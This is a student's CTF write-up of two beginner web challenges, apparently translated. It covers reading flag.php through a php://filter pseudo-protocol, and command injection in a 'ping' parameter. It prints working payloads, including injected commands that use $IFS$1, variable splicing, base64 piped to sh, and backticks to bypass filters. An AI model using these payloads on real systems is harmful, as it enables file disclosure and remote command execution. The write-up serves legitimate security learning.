1. [ACTF2020 Freshman Competition] Include
1. Topic
2. Problem solving steps
I clicked in and took a look
. According to the guess, it should be related to the vulnerability of the php file... I tried to display phpinfo, but it failed as expected. After watching wp, I realized that this is a pseudo-protocol problem. Then I flipped through the previous blog , copied the payload, and successfully solved the problem.
?file=php://filter/convert.base64-encode/resource=flag.php
3. Summary
- The second time I did the pseudo-protocol problem, I can only say that I am inexperienced and did not recognize it. You can try it next time you encounter a problem like this ?file= access file.
4. References
一、[GXYCTF2019]Ping Ping Ping
1. Topic
2. Problem solving steps
Confused, try sending variables to ip
. It is a rce vulnerability, but some keywords are filtered.
I really want to learn to write scripts and then use script tests to filter which ones... I know the types of vulnerabilities here, and which functions should be tested by exhaustive method. Not filtered...let's take a look at wp out of laziness...
It was me who lost, the wisdom of the master is indeed infinite, I did not expect to read the document directly
(Note: ls, cat are the commands for accessing files in linux)
Look at wp and know that it is because the spaces are filtered, and the masters use ${IFS}$
bypass. The system's own variable $IFS Internal Field Separator (IFS) defines a delimiter, which is a space by default. Know the principle, start to circle!
Good ↑'s ↓, the braces are filtered, the master said to be changed to $IFS$1
... Baidu for a long time, I don't understand why I use it$IFS$1
I didn't visit it here. The master suggested to visit index.php to
reveal the source code. You can see what content is filtered by the regular. There are three ways to bypass it.
- variable concatenation
?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
The general idea is to construct a variable a=g, and then the regex does not match the flag, so it is bypassed. What needs to be noted here is the regular form. The meaning of the code under index.php is to match the string, whether the four letters of flag appear in order. So if $a is placed in front of the parsing, the four letters of flag will appear directly, and only when the last one is placed will it have an effect.
- sh bypass
?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
Both sh and bash are a type of linux shell, and their syntax is compatible. index.php filters bash commands, but not sh commands. Transcode the words flag.php to base64 and then convert it back to bypass.
- Introverted execution
?ip=127.0.0.1;cat$IFS$1`ls`
Executes the output of the command enclosed in backticks as input. So this sentence becomes cat index.php flag.php. Two files will be displayed.
3. Summary
- The third rce question, I feel that the core is to bypass. This question taught me how to bypass spaces and three types of strings.
- Familiarize yourself with the linux commands. Like ls cat and bash, the concept of sh and so on.
- The regular rules are really metaphysical... I have been thinking about variable splicing for a long time. Why can only the last one be twisted? This matching rule is really interesting...
4. References
- Learn a shell variable $IFS - Happy Carnival - Blog Park
- [GXYCTF2019]Ping Ping Ping - Wang Tanzhi - Blog Park
- [GXYCTF2019] Ping Ping Ping (RCE)_xlcvv's blog - CSDN blog
- The difference between sh and bash in Linux SHELL
- Summary of Command Execution Vulnerabilities and Bypasses - ghtwf01 - Welcome to ghtwf01's blog